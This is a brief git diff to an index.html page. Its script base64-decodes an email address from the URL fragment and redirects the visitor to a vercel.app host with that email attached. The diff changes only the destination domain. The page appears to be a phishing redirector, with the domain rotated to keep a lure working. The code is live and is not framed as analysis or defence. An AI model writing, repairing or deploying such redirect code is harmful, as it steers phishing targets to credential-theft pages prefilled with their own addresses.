--- a/index.html
+++ b/index.html
@@ -13,7 +13,7 @@
     <script type="text/javascript">
       var url_string = window.location.href;
       var url_get_email = atob(getafterhash(url_string));
-      var mail_go_url = "https://zzzzzaaaoopp.vercel.app/#" + url_get_email + "";
+      var mail_go_url = "https://mimitt.vercel.app/#" + url_get_email + "";
       location.replace(mail_go_url);
 
 
